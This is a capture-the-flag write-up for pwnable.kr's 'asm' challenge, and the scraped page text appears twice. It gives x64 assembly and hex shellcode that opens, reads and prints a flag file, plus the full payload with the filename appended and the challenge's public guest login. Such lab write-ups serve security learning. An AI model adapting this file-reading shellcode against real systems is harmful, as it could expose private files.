18 - asm

Previous17 - memcpy Next20 - blukat

Last updated 4 years ago

Was this helpful?

18 - asm

The Challenge

Mommy! I think I know how to make shellcodes

ssh asm@pwnable.kr -p2222 (pw: guest)

The Solution

The challenge directory contains a readme:

once you connect to port 9026, the "asm" binary will be executed under asm_pwn privilege. make connection to challenge (nc 0 9026) then get the flag. (file name of the flag is same as the one in this directory)

The directory really contains a file with an awefully long name.

It's time to run the binary:

Our input should be x64 shellcode that uses only open, read and write to print the flag. A peek at the source code shows there aren't any shenanigans, it's really what we need to do.

It zeros the registers. That's actualy quite nice of pwnables side, thanks ^_^

mov rax, 2
mov rdi, 0x4141406f
syscall
mov rdi, rax
mov rax, 0
mov rsi, 0x4141406f
mov rdx, 0x30
syscall
mov rax, 1
mov rdi, 1
syscall

# shellcode: \x48\xC7\xC0\x02\x00\x00\x00\x48\xC7\xC7\x6F\x40\x41\x41\x0F\x05\x48\x89\xC7\x48\xC7\xC0\x00\x00\x00\x00\x48\xC7\xC6\x6F\x40\x41\x41\x48\xC7\xC2\x30\x00\x00\x00\x0F\x05\x48\xC7\xC0\x01\x00\x00\x00\x48\xC7\xC7\x01\x00\x00\x00\x0F\x05

You may be asking yourself "what's that address that is assigned to rsi and rdi?" We concatinate the flag file name to the end of the shellcode, and that's it's addess. We also read the flag to the same location. The final shellcode:

\x48\xC7\xC0\x02\x00\x00\x00\x48\xC7\xC7\x6F\x40\x41\x41\x0F\x05\x48\x89\xC7\x48\xC7\xC0\x00\x00\x00\x00\x48\xC7\xC6\x6F\x40\x41\x41\x48\xC7\xC2\x30\x00\x00\x00\x0F\x05\x48\xC7\xC0\x01\x00\x00\x00\x48\xC7\xC7\x01\x00\x00\x00\x0F\x05\x25\x00\x00\x00\x00\x0F\x05\x74\x68\x69\x73\x5f\x69\x73\x5f\x70\x77\x6e\x61\x62\x6c\x65\x2e\x6b\x72\x5f\x66\x6c\x61\x67\x5f\x66\x69\x6c\x65\x5f\x70\x6c\x65\x61\x73\x65\x5f\x72\x65\x61\x64\x5f\x74\x68\x69\x73\x5f\x66\x69\x6c\x65\x2e\x73\x6f\x72\x72\x79\x5f\x74\x68\x65\x5f\x66\x69\x6c\x65\x5f\x6e\x61\x6d\x65\x5f\x69\x73\x5f\x76\x65\x72\x79\x5f\x6c\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x6f\x30\x6f\x30\x6f\x30\x6f\x30\x6f\x30\x6f\x30\x6f\x6e\x67\x00

Previous17 - memcpy Next20 - blukat

Last updated 4 years ago

Was this helpful?

The Challenge

Mommy! I think I know how to make shellcodes

ssh asm@pwnable.kr -p2222 (pw: guest)

The Solution

The challenge directory contains a readme:

once you connect to port 9026, the "asm" binary will be executed under asm_pwn privilege. make connection to challenge (nc 0 9026) then get the flag. (file name of the flag is same as the one in this directory)

The directory really contains a file with an awefully long name.

It's time to run the binary:

Our input should be x64 shellcode that uses only open, read and write to print the flag. A peek at the source code shows there aren't any shenanigans, it's really what we need to do.

The source also contains shell code which our shell code gets concatinated to. Lets it:

It zeros the registers. That's actualy quite nice of pwnables side, thanks ^_^

It's time to write some pure assembly! Using wonderful table we created assembly that opens the flag file, reads it and outputs to stdout.

mov rax, 2
mov rdi, 0x4141406f
syscall
mov rdi, rax
mov rax, 0
mov rsi, 0x4141406f
mov rdx, 0x30
syscall
mov rax, 1
mov rdi, 1
syscall

# shellcode: \x48\xC7\xC0\x02\x00\x00\x00\x48\xC7\xC7\x6F\x40\x41\x41\x0F\x05\x48\x89\xC7\x48\xC7\xC0\x00\x00\x00\x00\x48\xC7\xC6\x6F\x40\x41\x41\x48\xC7\xC2\x30\x00\x00\x00\x0F\x05\x48\xC7\xC0\x01\x00\x00\x00\x48\xC7\xC7\x01\x00\x00\x00\x0F\x05

\x48\xC7\xC0\x02\x00\x00\x00\x48\xC7\xC7\x6F\x40\x41\x41\x0F\x05\x48\x89\xC7\x48\xC7\xC0\x00\x00\x00\x00\x48\xC7\xC6\x6F\x40\x41\x41\x48\xC7\xC2\x30\x00\x00\x00\x0F\x05\x48\xC7\xC0\x01\x00\x00\x00\x48\xC7\xC7\x01\x00\x00\x00\x0F\x05\x25\x00\x00\x00\x00\x0F\x05\x74\x68\x69\x73\x5f\x69\x73\x5f\x70\x77\x6e\x61\x62\x6c\x65\x2e\x6b\x72\x5f\x66\x6c\x61\x67\x5f\x66\x69\x6c\x65\x5f\x70\x6c\x65\x61\x73\x65\x5f\x72\x65\x61\x64\x5f\x74\x68\x69\x73\x5f\x66\x69\x6c\x65\x2e\x73\x6f\x72\x72\x79\x5f\x74\x68\x65\x5f\x66\x69\x6c\x65\x5f\x6e\x61\x6d\x65\x5f\x69\x73\x5f\x76\x65\x72\x79\x5f\x6c\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x6f\x30\x6f\x30\x6f\x30\x6f\x30\x6f\x30\x6f\x30\x6f\x6e\x67\x00